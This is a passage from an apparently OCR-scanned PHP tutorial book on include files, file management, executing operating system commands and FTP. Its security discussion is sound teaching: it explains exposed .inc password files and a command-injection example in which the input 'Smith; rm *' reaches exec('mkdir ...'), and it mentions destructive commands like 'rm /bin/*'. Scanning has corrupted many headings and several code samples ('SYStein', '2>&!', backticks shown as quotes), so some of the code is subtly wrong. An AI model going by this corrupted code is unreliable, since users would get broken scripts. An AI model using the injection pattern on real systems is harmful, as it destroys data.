include("catalog.inc"); 

} 

else 


{ 

include("logout.inc"); 

} 

?> 


If the user clicks Continue Shopping, a file containing HTML code that dis¬ 
plays the catalog is used. If the users clicks the Log Out button, a file that 
contains the HTML code for the log-out message is used. We discuss the 
details of using include files later in this chapter in the “Organizing with 
include files” section. 


You can see how much easier the script is to read with only the include 
statement in the script, rather than with all the HTML code needed to display 
the page cluttering up the script. 


Reusing code 

Another practice that makes scripts easy to maintain is reusing code. It’s 
common to find yourself typing the same ten lines of PHP statements in 
several places in the script. You can store that block of code and reuse it 
wherever it’s needed. 

Storing reusable code separately makes the script easier to read and under¬ 
stand. In addition, when the code needs changing, you just change it in one 
place, rather than changing it in a dozen different places in the script. 

You can reuse code by storing the code in a function and calling the function 
wherever you need to perform the task. Creating and using functions is dis¬ 
cussed earlier in this chapter, in the “Using Functions” section. 

Another way you can reuse code is to store the code in a separate file and 
incorporate the file into the script where it is needed. You can bring an 
external file into a script with an include statement, discussed later in this 
chapter in the “Organizing with include files” section. 


Or^anizin^ With functions 

Make frequent use of functions to organize your scripts. Functions are useful 
when your script needs to perform the same task at repeated locations in a 
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script, in different scripts in the application, and even in different applications. 
After you write a function that does the task and you know it works, you can 
use it anywhere that you need it. 

Look for opportunities to use functions. Your script is much easier to read 
and understand with a line like this: 

getCustomerName(); 

than with 20 lines of statements that actually get the customer name. In fact, 
after you’ve been writing PHP scripts for a while, you’ll have a stash of func¬ 
tions that you’ve written for various scripts. Very often the script that you’re 
writing can use a function that you wrote for another application two jobs 
ago. For instance, you may often have a need for a list of the states. Rather 
than include a list of all 50 states in the United States every time you need it, 
you could create a function called getStateNames () that returns an array 
that holds the 50 state names in alphabetical order and a function called 
getStateCodes () that returns an array with all 50 two-letter state abbre¬ 
viation codes in the same order. 

Always use descriptive function names. The function calls in your script 
should tell you exactly what the functions do. Long names are okay. You 
don’t want to see a line in your script that reads 

functionl(); 

Even a line like the following is less informative than it could be: 

getData(); 

You want to see a line like this: 

getAllCustomerNames(); 


Or^anizin^ With inctude files 

include statements bring the content of a file into your script. Thus, you 
can put statements into an external file — a file separate from your script 
file — and insert the file wherever you want in the script with the include 
statement, include statements are useful for storing statements that are 
repeated. Here are some ways to use include files to organize your scripts: 
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♦ Put all or most of your HTML into include files. For instance, if your 
script sends a form to the browser, put the HTML for the form into an 
external file. When you need to send the form, use an include state¬ 
ment. Putting the HTML into an include file is a good idea if the form is 
shown several times. It’s even a good idea if the form is shown only once 
because it makes your script much easier to read. 
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♦ Put your functions in include files. You don’t need the statements 
for functions in the script; you can put them in an include file. If you 
have a lot of functions, organize related functions into several include 
files, such as data_functions . inc and f orin_functions . inc. Use 
include statements at the top of your scripts, reading in only the func¬ 
tions that are used in the script. 

♦ Store statements that all the files on your website have in common. 

Most websites have many web pages with many elements in common. 
For instance, all web pages start with <htinl>, <head>, and <body> 
tags. If you store the common statements in an include file, you can 
include them in every web page, ensuring that all your pages look alike. 
For instance, you might have the following statements in an include 
file: 

<html> 

<head><title><?php echo $title ?></title></head> 

<bodY topmargin="0"> 

<p style="text-align: center"> 

<img src="logo.gif" width="100" height="200"> 

<hr color="red" /> 

If you include this file at the top of every script on your website, you 
save a lot of typing, and you know that all your pages match. In addi¬ 
tion, if you want to change anything about the look of all your pages, you 
have to change it only in one place — in the include file. 

Including fifes 

You use an include statement to bring the content of an external text file 
into your script. The format for an include statement is 

include(" filename") ; 

The file can have any name. We, your humble book authors, like to use the 
extension . inc so that we know the file is an include file as soon as we see 
the name. It helps with the organization and clarity of a website. 

PHP provides four types of include statements: 

♦ include: Includes and evaluates the specified file. It displays a warning 
if it can’t find the specified file. 

♦ require: Performs the same was as the include statement, except that 
it produces, in addition to a warning, a fatal error when it can’t find the 
specified file, stopping the script at that point. 

♦ include_once: Performs the same as the include statement, except it 
includes the file only once. If the file has already been included, it won’t 
be included again. In some scripts, a file might be included more than 
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once, causing function redefinitions, variable reassignments, and other 
possible problems. 

♦ require_once: Performs the same as the require statement, except it 
includes the file only once. If the file has already been included, it won’t 
be included again. This statement prevents problems that might occur 
when a file is included more than once. 

The external file is included in your script at the location of the include 
statement. The content of the file is read as HTML code, not PHP. Therefore, 
if you want to use PHP statements in your include file, you must include 
PHP tags in the include file. 

Forgetting the PHP tags in the include file is a common mistake. It’s also 
a security problem because without the PHP tags, the code in the include 
file is displayed to the user as HTML. You don’t want your database pass¬ 
word displayed on your web page. We discuss include file security later in 
this chapter in the section “Storing include files securely.” 

Using (Jariahtes in include statements 

You can use a variable name for the filename, as follows: 

include ("$ filename "); 

For example, you might want to display different messages on different days. 

You might store these messages in files that are named for the day on which 
the message should appear. For instance, you can have a file named Sun. 
inc with the following content: 

<p>Go ahead. Sleep in. No work today.</p> 

and similar files for all days of the week. The following statements can be 
used to display the correct message for the current day: 
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After the first statement, $ today contains the day of the week, in abbrevia¬ 
tion form. The date statement is discussed in Chapter 1 in this minibook. 
The second statement includes the correct file, using the day stored in 
$ today. If $ today contains Sun, the statement includes a file called Sun. inc. 

Storing include files securelg 

Where you store include files can be a security issue for websites. Files 
stored on websites can be downloaded by any user, unless protected. 
Theoretically, a user can connect to your website by using the following URL: 


$today = date("D"); 
include(”$today".".inc”); 
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http://example.com/secretpasswords.inc 

If the web server is configured to process PHP sections only in files with 
the .php extension and secretpasswords. inc contains the following 
statements: 

<?php 

$mysecretaccount="account48756"; 

$mYpassword="secret"; 

?> 

the web server would obligingly display the contents of secretpasswords. 
inc to the user. You can protect against this in one of the following ways: 

♦ Name include files with .php extensions. This needs to be done care¬ 
fully because it allows some PHP code to be run independently, without 
any context. For instance, suppose you have code in your include file 
that deleted a record in the database (highly unlikely). Running tbe code 
outside of a script might have negative consequences. Also, you might 
find it convenient to name files with a . inc extension, so you can see at 
a glance that it’s a fragment, not a script intended to run by itself. 

♦ Configure the web server to scan for PHP sections in files with the 
. inc extension, as well as the .php extension. This allows you to 
recognize include files by their names, but it still has the problem of 
possible unintended consequences of running the file independently, as 
discussed earlier. 

♦ Store the file in a location that isn’t accessible to outside users. This is 
the preferred solution, but it may not be possible in some environments, 
such as when using a web hosting company. 

The best place to store include files is a directory where outside users 
cannot access them. For instance, for your website, set up an include 
directory that is outside your web space: that is, a directory in a location 
that outside users can’t access using their browsers. For instance, the 
default web space for Apache, unless it has been changed in the configura¬ 
tion file (usually httpd. conf), is htdocs in the directory where Apache is 
installed. If you store your include files in a directory that isn’t in your web 
space, such as d: \ include, you protect the files from outside users. 

To include a file from a hidden directory (such as a directory outside your 
web space), you can use the full pathname to the file, as follows: 

include("d:/hidden/secretpasswords.inc"); 

However, PHP allows you to set an include directory. You can include files 
from the include directory using only the filename. 
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Setting up include directories 

PHP looks for include files in the current directory, where your weh page 
file is stored, and in one or more directories specified by a setting in your 
php. ini file. You can include files from the include directory without 
specifying the path to the file. 

You can see the current include directory location by using the phpinf o () 
statement. In the output, in the PHP core section, you can find a setting for 
include_path that shows where your current include directory is located. 
For example, in PHP 5, the default location might be c: \php5\pear. 

You can change the setting for your include directory in the php. ini file. 
Find the setting for include_path and change it to the path to your pre¬ 
ferred directory, as follows: 

include_path=".;c:\php\include"; # for Windows 

include_path=".:/user/local/include"; # for Unix/Linux 

Both of the statements specify two directories where PHP looks for include 
files. The first directory is dot (meaning the current directory), followed by 
the second directory, path. You can specify as many include directories 
as you want and PHP will search them, in the order in which they are listed, 
to find the include file. The directory paths are separated by a semicolon 
for Windows or a colon for Unix and Linux. 

If you can’t set the path yourself in php. ini, you can set the path in each 
Individual script by using the following statement: 

ini_set ("include_path", "d: \hidden'') ; 

The statement sets the include_path to the specified directory only while 
the script is running. It doesn’t set the directory for your entire website. 
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If your include file isn’t in an include directory, you may need to use 
the entire pathname in the include statement. If the file is in the same 
directory as the script, the filename alone is sufficient. However, if the file 
is located in another directory, such as a subdirectory of the directory the 
script is in or in a hidden directory outside the web space, you need to use 
the full pathname to the file, as follows: 


To access a file from an include directory, just use the filename, as follows. 
You don’t need to use the full pathname. 

include("secretpasswords.inc"); 


include("d:\hidden\secretpasswords.inc"); 
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In This Chapter 

Manipulating files 

Using operating system commands on files 
Transferring files from one machine to another 
Reading and writing files 
u* Swapping data with other programs 
u* Using SQLite to store data in text files 


t his book describes using tools like HTML, PHP, MySQL, and CSS together 
m to develop dynamic web applications. The HTML and CSS provide the 
presentation and markup of pages, while PHP displays web pages and inter¬ 
acts with MySQL to retrieve and store data for the application. For most 
web applications, PHP needs to interact only with MySQL. However, a few 
situations require a web application that’s more complex. The web applica¬ 
tion might need to interact with the operating system or with other software 
on your system. 

A photo gallery is one web application that might need to interact with your 
operating system. Your photo gallery might allow users to upload graphic 
files into your application. For such an application, you might need to manage 
the files that the users upload. You might need to rename them, move them, 
or delete them. You might need to know when the photos were uploaded 
or when they were last accessed. PHP provides all the features you need to 
manage your file system, and we help you understand how to do that. 

PHP also allows you to run any program that’s on your computer, regardless 
of whether it’s a PHP program. With PHP code, you can transfer files between 
computers by using File Transfer Protocol (FTP). You can store information 
in files other than databases. This chapter gives you the information you need 
to use PHP to do pretty much anything you can think of on your computer. 
This chapter also provides information on the security risks inherent in 
executing operating system commands. The chapter wraps up with a look at 
a quick way to store data through a utility called SQLite. 
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Managing Fites 

The information you save on your hard drive is organized into files. Rather 
than storing files in one big file drawer, making them difficult to find, files are 
stored in many drawers, called directories or folders. The system of files and 
directories is called a file system. 

A file system is organized in a hierarchical structure, with a top level that is a 
single directory called root, such as c: \ on Windows or / on Linux or Mac. The 
root directory contains other directories, and each directory can contain other 
directories, and so on. The file system’s structure can go down many levels. 

A directory is a type of file that you use to organize other files. It contains a 
list of files and the information needed for the operating system to find those 
files. A directory can contain both files and other directories. 


Files can be checked (to see if they exist, for example), copied, deleted, and 
renamed, among other things. Functions for performing these file-management 
tasks are described in the following sections. You also find out about functions 
that allow you to manage directories and discover what’s inside them. 



In this chapter, we cover the most useful functions for managing files, but 
more functions are available. When you need to perform an action on a file 
or directory, first check the online PHP documentation at www. php. net / 
manual to see whether an existing function does what you need to do. 
Using a function is preferable, if an appropriate function exists. If such a 
function does not exist, you can use your operating system commands or a 
program in another language, as described in the “Using Operating System 
Commands” section, later in this chapter. 


Getting information about fifes 

Often you want to know information about a file. PHP has functions that 
allow you to find out file information from within a script. 

You can find out whether a file exists with the f ile_exists statement, as 
follows: 

$result = file_exists("stuff.txt"); 

After this statement, $result contains either true or false. The function 
is often used in a conditional statement, such as the following: 

if(!file_exists("stuff.txt")) 

{ 

echo "File not found!\n"; 

} 

When you know the file exists, you can find out information about it. 


Mana^in^ Fites 


Table 3-1 shows many of the functions that PHP provides for checking files. 
(Some of the information in Table 3-1 is relevant only for Linux, Unix, and 
Mac, and some is returned on Windows as well.) 


Table 3-1 Functions That Get Information about a File 

Function 

IVhat It Does 

Output 

is_file("stuff.txt") 

Tests whether the 
file is a regular file, 
rather than a direc¬ 
tory or other special 
type of file 

true or false 

is_dir("stuff.txt") 

Tests whether the 
file is a directory 

true or false 

is_executable("do.txt") 

Tests whether the 
file is executable 

true or false 

is_writable("stuff.txt") 

Tests whether you 
can write to the file 

true or false 

is_readable("stuff.txt") 

Tests whether you 
can read the file 

true or false 

fileatime("stuff.txt") 

Returns the time 
when the file was 
last accessed 

Unix time- 
stamp (like 
1057196122)or 
false 

ffleetime("stuff.txt") 

Returns the time 
when the file was 
created 

Unix timestamp or 

false 

filemtime("stuff.txt") 

Returns the time 
when the file was 
last modified 

Unix timestamp or 

false 

filegroup("stuff.txt") 

Returns the group 

ID of the file 

Integerthatis a 
group ID or false 

fileowner("stuff.txt") 

Returns the user 

ID of the owner of 
the file 

Integerthat is a 
user ID or false 

filesize("stuff.txt") 

Returns the file size 
in bytes 

Integeror false 

filetype("stuff.txt") 

Returns the file type 

File type (such 
as file, dir, 
link, char), or 
false if error or 
can't identify type 

basename("/tl/do.txt") 

Returns the file¬ 
name from the path 

do.txt 

dirname("/tl/do.txt") 

Returns the directory 
name from the path 

/tl 
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A function that returns useful information about a path/filename is 
pathinf o (). You can use the following statement: 

$pinfo = pathinfo("/topdir/nextdir/stuff.txt"); 

After the statement, $pinf o is an array that contains the following three 
elements: 


$pinfo[dirname] = /topdir/nextdir 
$pinfo[basename] = stuff.txt 
$pinfo[extension] = txt 



When you’re testing a file with one of the is_somethingiunctions from 
Table 3-1, any typing error, such as a misspelling of the filename, gives a 
false result. For example, is_dir (''tyme" ) returns false if ''tyme" is 
a file, not a directory. But, it also returns false if " tyme " does not exist 
because you meant to type " type". 

Unix timestamps are returned by some of the functions given in Table 3-1. 
You can convert these timestamps to dates with the date function, as 
described in Chapter 1 in this mlnlbook. 


Copi^in^, renaming, and deleting files 

You can copy an existing file into a new file. After copying, you have two 
copies of the file with two different names. Copying a file is often useful for 
backing up important files. To copy a file, use the copy statement, as follows: 


copy("fileold.txt","filenew.txt"); 


This statement copies fileold.txt, an existing file, into filenew.txt. If a 
file with the name filenew.txt already exists, it’s overwritten. If you don’t 
want to overwrite an existing file, you can prevent it by using the following 
statements: 


If(!file_exists(”filenew.txt”)) 

{ 

copy("fileold.txt","filenew.txt"); 


} 

else 

{ 


} 


echo "File already exists!\n"; 


You can copy a file into a different directory by using a pathname as the des¬ 
tination, as follows: 


copy("fileold.txt","newdir/filenew.txt"); 
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You can rename a file by using the rename statement, as follows: 
rename("oldname.txt","newname.txt"); 

If you attempt to rename a file with the name of a file that already exists, a 
warning is displayed, as follows, and the file is not renamed: 

Warning: rename(fileold.txt,filenew.txt): File exists in 

c:test.php on line 17 

To remove an unwanted file, use the unlink statement, as follows: 
unlink("badfile.txt"); 

After this statement, the file is deleted. 

If the file doesn’t exist to start with, unlink doesn’t complain. It acts the 
same as if it had deleted the file. PHP doesn’t let you know if the file doesn’t 
exist. So, watch out for typos. 

Or^anizin^ files 

Files are organized into directories, also called folders. This section 
describes how to create and remove directories and how to get a list of the 
files in a directory. 

Creating a directory 

To create a directory, use the mkdir function, as follows: 
mkdir(”testdir”); 

This statement creates a new directory named testdir in the same directory 
where the script is located. That is, if the script is /test/test .php, the 
new directory is /test/testdir. If a directory already exists with the same 
name, a warning is displayed, as follows, and the new directory is not created: 

Warning: mkdir(): File exists in d;/test/test.php on line 5 

You can check first to see whether the directory already exists by using the 
following statements: 

If(!is_dir("mynewdir")) 

{ 

mkdir("mynewdir"); 

} 

else 

{ 
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echo "Directory already exists!"; 
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After the directory is created, you can organize its contents by copying 
files into and out of the directory. Copying files is described in the section 
“Copying, renaming, and deleting files,” earlier in this chapter. 

To create a directory in another directory, use the entire pathname, as follows: 

mkdir("/topdir/nextdir/mynewdir"); 

You can use a relative path to create a new directory, as follows: 

mkdir("../mynewdir") ; 

With this statement, if your script is /topdir/test/makedir .php, the 
new directory is /topdir/mynewdir. 

To change to a different directory, use the following statement: 

chdir("../anotherdir”) ; 


Building a list of att the files in a directorif 

Getting a list of the files in a directory is often useful. For example, you 
might want to provide a list of files for users to download or want to display 
images from files in a specific directory. 

PHP provides functions for opening and reading directories. To open a 
directory, use the opendir statement, as follows: 

$dh = opendir("/topdir/testdir") ; 

If you attempt to open a directory that doesn’t exist, a warning is displayed, 
as follows: 

Warning: opendir(testdir): failed to open dir: Invalid 
argument in testl3.php on line 5 

In the previous statement, the variable $dh is a directory handle, a pointer to 
the open directory that you can use later to read from the directory. To read 
a filename from the directory, use the readdir function, as follows: 

$filename = readdir($dh); 

After this statement, $ filename contains the name of a file. Only the file¬ 
name is stored in $f ilename, not the entire path to the file. To read all the 
filenames in a directory, you can use a while loop, as follows: 

while($filename = readdir($dh)) 

{ 

echo $filename."\n"; 

} 
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The readdir function doesn’t provide any control over the order in which 
filenames are read, so you don’t always get the filenames in the order you 
expect. 

Suppose you want to create an image gallery that displays all the images in 
a specified directory in a web page. You can use the opendir and readdir 
functions to do this. Listing 3-1 shows a script that creates an image gallery. 


Listing 3-1: A Script That Creates an Image Gallery 

<?php 

/* * Script name: displayGallery 

* Description: Displays all the image files that are 

* stored in a specified directory. 

*/ 

echo ”<html><head><title>lmage Gallery</title></head> 


<body>"; 

$dir = "../testl/testdir/"; —>8 

$dh = opendir($dir); — >9 

while($filename = readdir($dh)) —HO 

{ 

$filepath = $dir.$filename; — >12 

if(is_file($filepath) and ereg(”\.jpg$",$filename)) — >13 


{ 

$gallery[] = $filepath; 

} 

} 

sort($gallery); — >16 

foreach($gallery as $image) — >17 

{ 

echo "<hr />"; 

echo ''<img src='$image' /><br />"; 

} 

?> 

</body></html> 

Notice the line numbers at the end of some of the lines in Listing 3-1. The 
following discussion of the script and how it works refers to the line numbers 
in the script listing: 

—>8 This line stores the name of the directory in $dir for use later in 

the program. Notice that the / is included at the end of the direc¬ 
tory name. Don’t use \, even with Windows. 

—>9 This line opens the directory. 

—>10 This line starts a while loop that reads in each filename in the 

directory. 
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This line creates the variable $f ilepath, which is the complete 
path to the file. 

If the / isn’t included at the end of the directory name on Line 8, 
$f ilepath will not be a valid path. 

This line checks to see whether the file is a graphics file by look¬ 
ing for the . jpg extension. If the file has a . jpg extension, the 
complete file path is added to an array called $gallery. 

This line sorts the array so the images are displayed in alphabetical 
order. 

This line starts the foreach loop that displays the images in the 
web page. 


Usin^ Operating System Commands 

When you need to interact with your operating system, it’s always best to 
use the PHP functions that are provided for this purpose. Using PHP func¬ 
tions is faster and usually more secure than executing an operating system 
command directly. However, occasionally PHP doesn’t provide a function 
to perform the task you need. In such cases, you can use PHP features that 
enable you to execute an operating system command. 

In this section, we assume that you know the format and use of the system 
commands for your operating system. Describing operating system com¬ 
mands is outside the scope of this book. If you need to run an operating 
system command from your PHP script, this section shows you how. 

PHP allows you to use system commands or run programs in other lan¬ 
guages by using any of the following methods: 

♦ backticks: PHP executes the system command that is between two back- 
ticks (') and displays the result. 

♦ system function: This function executes a system command, displays 
the output, and returns the last line of the output. 

♦ exec function: This function executes a system command, stores the 
output in an array, and returns the last line of the output. 

♦ passthru function: This function executes a system command and dis¬ 
plays the output. 

You can execute any command that you can type into the system prompt. 
The command is executed exactly as is. You can execute simple commands: 
Is or dir, rename or mv, rm or del, though it’s more efficient to use the 
built-in PHP functions for those, as already discussed. 
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If your operating system allows you to pipe or redirect output, you can pipe 
or redirect in the system command you’re executing in PHP. If your operat¬ 
ing system allows you to enter two commands on one line, you can put two 
commands into the single command you’re executing from PHP. The following 
sample commands are valid to execute from PHP, depending on the operating 
system: 

dir 

rm badfile.txt 
dir I sort 

cd c:\php ; dir (Not valid in Windows) 

"cd c:\php && dir" (Windows) 

dir > dirfile 

sort < unsortedfile.txt 

On some occasions, you want to run a system command that takes a long 
time to finish. You can run the system command in the background (if your 
operating system supports such things) while PHP continues with the script. 
If you do this, you need to redirect the output to a file, rather than return it 
to the script, so that PHP can continue before the system command finishes. 

The following sections describe the preceding methods in greater detail. 


Usin0 backticks 

A simple way to execute a system command is to put the command between 
two backticks ('), as follows: 


$result = 'dir c:\php'; 

The variable $result contains the statement’s output — in this case, a 
list of the files in the c : \php directory. If you echo $result, the following 
output is displayed: 

Volume in drive C has no label. 

Volume Serial Number is 58B2-DBD6 


Directory 

of c:\php 



10/10/2013 

05:43 

PM 

<DIR> 


10/10/2013 

05:43 

PM 

<DIR> 


10/10/2013 

04:53 

PM 

<DIR> 

dev 

10/10/2013 

04:53 

PM 

<DIR> 

ext 

10/10/2013 

04:53 

PM 

<DIR> 

extras 
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35 File(s) 

1 11 


6 Dir(s) 

180,66 


417,792 fdftk.dll 
90,112 fribidi.dll 
346,624 gds32.dll 

90 go-pear.bat 
96,317 install.txt 
097,728 libeay32.dll 
166,912 librncrypt.dll 
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035,712 libmysql.dll 
385,024 libswish-e.dll 
3,286 license.txt 
57,344 msql.dll 
168,858 news.txt 
278,800 ntwdblib.dll 
PEAR 

41,017 php-cgi.exe 
32,825 php-win.exe 
32,821 php.exe 
2,523 php.gif 
46,311 php.ini-dist 
49,953 php.ini-recommended 

36.924 php5apache.dll 

36.925 php5apache2.dll 
36,927 php5apache2_2.dll 
36,932 php5apache2_filter.dll 
57,410 php5apache_hooks.dll 

669,318 php5embed.lib 
28,731 php5isapi.dll 
28,731 php5nsapi.dll 
796,472 php5ts.dll 
86,076 php_mysqli.dll 
135 pws-php5cgi.reg 
139 pws-php5isapi.reg 
1,830 snapshot.txt 
200,704 ssleay32.dll 
,569,880 bytes 
4,549,376 bytes free 


The backtick operator is disabled when saf e_mode is enabled. On some 
systems, safe_mode is set to Off by default when PHP is installed. On 
other systems, safe_mode is set to On. The system administrator can 
change this value. 


Usin^ the sifstem function 

The system function executes a system command, displays the output, and 
returns the last line of the output from the system command. To execute a 
system command, use the following statement: 


$result = system("dir c:\php''); 
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When this statement executes, the directory listing is displayed, and 
$result contains the last line that was output from the command. If you 
echo $result, you see something like the following: 

11 Dir(s) 566,263,808 bytes free 

The contents of $result with the system function is the last line of the 
output from the dir command. 


Usin0 the exec function 

The exec function executes a system command but doesn’t display the 
output. Instead, the output can be stored in an array, with each line of the 
output becoming an element in the array. The last line of the output is 
returned. 

Perhaps you just want to know how many files and free bytes are in a direc¬ 
tory. With the following statement, you execute a command without saving 
the output in an array: 

$result = exec ("dir c:\php''); 

The command executes, but the output isn’t displayed. The variable 
$result contains the last line of the output. If you echo $result, the dis¬ 
play looks something like this: 

11 Dir(s) 566,263,808 bytes free 

The output is the last line of the output of the dir command. If you want to 
store the entire output from the dir command in an array, use the following 
command: 


$result = exec("dir c:Xphp”,$dirout); 


After this statement, the array $dirout contains the directory listing, with 
one line per item. You can display the directory listing as follows: 

foreach($dirout as $line) 

{ 

echo "$line\n''; 

} 
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The loop displays the following: 

Volume in drive C has no label. 
Volume Serial Number is 394E-15E5 


Directory of c:\php 
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10/10/2013 

05:43 

PM 

<DIR> 


10/10/2013 

05:43 

PM 

<DIR> 


10/10/2013 

04:53 

PM 

<DIR> 

dev 

10/10/2013 

04:53 

PM 

<DIR> 

ext 

10/10/2013 

04:53 

PM 

<DIR> 

extras 

08/30/2013 

07 :11 

AM 


417,792 fdftk.dll 


You can also use the following statements to get specific elements from the 
output array: 

echo $dirout[3]; 
echo $dirout[7]; 

The output is as follows: 

Directory of C:\PHP 

10/10/2013 04:53 PM <DIR> dev 

Usin^ the passthm function 

The pass thru function executes a system command and displays the 
output exactly as it is returned. To execute a system command, use the fol¬ 
lowing statement: 

passthru("dir c:\php"); 

The statement displays the directory listing but doesn’t return anything. 
Therefore, you don’t use a variable to store the returned data. 

The output is displayed in raw form; it isn’t processed. Therefore, this func¬ 
tion can be used when binary output is expected. 

Accessing error messages from sifstem commands 

The methods for executing system commands do not display or return an 
informational error message when the system command fails. You know 
the system command didn’t work because you didn’t get the outcome you 
expected. But because the functions don’t return error messages, you don’t 
know what went wrong. 

You can return or display the operating system error message by adding 
a few extra characters to the system command you’re executing. On most 
operating systems, if you add the characters 2>&1 after the system com¬ 
mand, the error message is sent to wherever the output is directed. For 
example, you can use the following statement: 


$result = SYStein("di c:\php"); 
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The system function displays the directory when the system command 
executes. However, notice that dir is mistyped. It is di rather than dir. No 
system command called di exists, so the system command can’t execute, 
and nothing is displayed. Suppose you used the following statement instead: 

$result = SYStem("di c:\php 2>&!"); 

In this case, the error message is displayed. On Windows, the error message 
displayed is as follows: 

'di' is not recognized as an internal or external command, 
operable program or batch file. 

Be sure you don’t include any spaces in 2>&1. The format requires the char¬ 
acters together, without any spaces. 


Understanding security issues 

When you execute a system command, you allow a user to perform an action 
on your computer. If the system command is dir c: \php, that’s okay. 
However, if the system command is rm /bin/ * or del c : \ * . *, you won’t 
be happy with the results. You need to be careful when using the functions 
that execute system commands outside your script. 

As long as you execute only commands that you write yourself, such as dir 
or Is, you’re okay. But when you start executing commands that Include 
data sent by users, you need to be extremely careful. For example, suppose 
you have an application in which users type a name into a form and your 
application then creates a directory with the name sent by the user. The 
user types Smith into the form field named directoryName. Your script 
that processes the form has a command, as follows: 


$directoryName = $_POST['directoryName']; 
exec("mkdir $directoryName"); 

Because $directoryName = Smith, mkdir Smith is the system com¬ 
mand that is executed. The directory is created, and everybody is happy. 
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However, suppose the user types Smith; rm * into the form. In this case, 
$directoryName =Smith;rm *. The system command that executes is now 
mkdir Smith; rm *. On many operating systems, such as Unix and Linux, 
the semicolon character separates two commands so that two commands 
can be entered on one line. Oops! The commands are executed as follows: 

mkdir Smith 


rm 
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Now you have a problem. The directory Smith is created, and all the files in 
the current directory are removed. 

If you use a variable in a system command, you must use it carefully. You 
must know where it came from. If it comes from outside the script, you need 
to check the value in the variable before using it. In the preceding example, 
you could add code so the script checks the variable to be sure it contains 
only letters and numbers before using it in the mkdir command. (Chapter 2 
in this minibook describes how to use an if statement to perform such 
checks.) 


Using FTP 

Transferring files from one computer to another happens a gazillion times a 
day on the Internet. When colleagues on opposite sides of the country need 
to share files, it isn’t a problem. A quick transfer takes only seconds, and all 
parties have the files they need. 

File Transfer Protocol (FTP) is a common way to transfer files from one 
computer to another. FTP allows you to get a directory listing from another 
computer or to download or upload a single file or several files at once. 

FTP is client/server software. To use FTP to transfer files between your 
computer and a remote computer, you connect to an FTP server on the 
remote computer and send it requests. 

It’s worth noting that FTP is inherently insecure, and not in a way that therapy 
will help. When you use FTP, your username, password, and the files them¬ 
selves are passed over the network without encryption. This means that 
someone with enough knowledge and access to your network could “sniff” 
the username and password. If you’re looking for a more secure method for 
transferring files, look to the SCP or SFTP commands. That said, FTP is still 
in wide use, especially for hosting providers. 

To use FTP in your scripts, FTP support needs to be enabled when PFfP is 
installed. If you installed PHP for Windows, you don’t need to do anything 
extra to enable FTP support. If you’re compiling PFfP on Unix, Linux, or Mac 
and you want to enable FTP support, you can use the FTP support installation 
option, as follows: 

--enable-ftp 

In this section, we tell you what you need to know about logging in to your 
FTP server, accessing a directory listing, transferring files to and from the 
FTP server, and using various functions to accomplish FTP-related tasks. 
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Lo00in0 in to the FTP serUer 

To connect to the FTP server on the computer you want to exchange files 
with, use the f tp_connect function, as follows: 

$connect = ftp_connect("janet.valade.com”); 

Or, you can connect by using an IP address, as follows: 

$connect = ftp_connect("172.17.204.2"); 

After you connect, you must log in to the FTP server. You need a user ID and 
a password to log in. You might have your own personal ID and password, 
or you might be using a general ID and password that anyone can use. Some 
public sites on the Internet let anyone log in by using the user ID of anonymous 
and the user’s e-mail address as the password. It’s best for security to put 
the user ID and password into a separate file and to include the file when 
needed. 

The f tp_login function enables you to log in to an FTP server after you’ve 
made the connection. This statement assumes you have your account ID and 
password stored in variables, as follows: 

$login_result = ftp_login($connect,$userid,$passwd); 

If you try to log in without establishing a connection to the FTP server first, 
you see the following warning: 

Warning: ftp_login() expects parameter 1 to be resource, 
boolean given in d:\testl\testl3.php on line 9 
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The warning doesn’t stop the program. The login fails, but the script con¬ 
tinues, which probably isn’t what you want. Because the rest of your script 
probably depends on your successful FTP connection, you might want to 
stop the script if the functions fail. The following statements stop the script 
if the function fails: 

$connect = ftp_connect("janet.vaiade.com") 

or die("Can't connect to server"); 

$login_result = ftp_login($connect,$userid,$passwd) 
or die("Can't login to server"); 

After you log in to the FTP server, you can send it requests to accomplish 
tasks, such as getting a directory listing or uploading and downloading files, 
as described in the following sections. 
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Getting a directori^ tistin^ 

One common task is to get a directory listing. The f tp_nlist statement 
gets a directory listing from the remote computer and stores it in an array, 
as follows: 

$filesArr = ftp_nlist($connect,"data"); 

The second parameter in the parentheses is the name of the directory. If 
you don’t know the name of the directory, you can request the FTP server to 
send you the name of the current directory, as follows: 

$directorY_name = ftp_pwd($connect); 

$filesArr = ftp_nlist($connect,$directory_name); 

The directory listing that FTP sends after the f tp_nlist statement runs is 
stored in an array, one filename in each element of the array. You can then 
display the directory listing from the array, as follows: 

foreach($filesArr as $value) 

{ 

echo "$value\n"; 

} 


boWntoadin^ and uploading files With FTP 

You can download a file from the remote computer with the f tp_get func¬ 
tion. The following statement downloads a file from the remote computer 
after you’re logged in to the FTP server: 

ftp_get($connect, "newfile.txt", "data.txt",FTP_ASCII); 

The first filename, new file, txt, is the name the file will have on your com¬ 
puter after it’s downloaded. The second filename, data. txt, is the existing 
name of the file that you want to download. 

The FTP_ASCii term in the statement tells FTP what kind of file is being 
downloaded. Here are the choices for file mode: 


♦ FTP_ASCii: These are text files. 

-f ftp_binary: Machine language files, basically anything that isn’t plain 
text. 



You can determine which file mode you need by examining the contents of 
the file. If the contents are characters that you can read and understand, the 
file is ASCII. If the contents appear to be garbage, the file is binary. Graphic 
files, for example, are binary. 
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You can upload a file with a similar function called f tp_put. The following 
statement uploads a file: 

ftp_put($connect, "newfile.txt","data.txt" ,FTP_ASCII); 

The first filename, newfile. txt, is the name the file will have on the 
remote computer after it’s uploaded. The second filename, data. txt, is the 
existing name of the file that you want to upload. 

When you’re finished transferring files over your FTP connection, you can 
close the connection with the following statement: 

ftp_close($connect); 

The script in Listing 3-2 downloads all the files in a directory that have a 
. txt extension. The files are downloaded from the remote computer over 
an FTP connection. 


Listing 3-2: A Script to Download Files via FTP 

<?php 

/* * Script name: downloadFiles 

* Description: Downloads all the files with a .txt 

* extension in a directory via FTP. 

*/ 

include(”ftpstuff.inc"); 

$dir_name = "data/"; 

$connect = ftp_connect($servername) 

or die("Can't connect to FTP server"); 

$login_result = ftp_login($connect,$userlD,$passwd) 
or die("Can't log in"); 

$filesArr = ftp_nlist($connect,$dir_name); 
foreach($filesArr as $value) 

{ 

if(preg_match("#\.txt$#",$value)) 

{ 

if(!file_exists($value)) 

{ 

ftp_get($connect,$value,$dir_name.$value,FTP_ASCII); 

} 

else 

{ 

echo "File $value already exists!\n"; 

} 

} 

} 

ftp_close($connect); 
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The script gets a directory listing from the remote computer and stores it in 
$f ilesArr. The foreach statement loops through the filenames in $f lies 
Arr and checks to see whether each file has a . txt extension. When a file 
has a . txt extension, the script tests to see whether a file with the same 
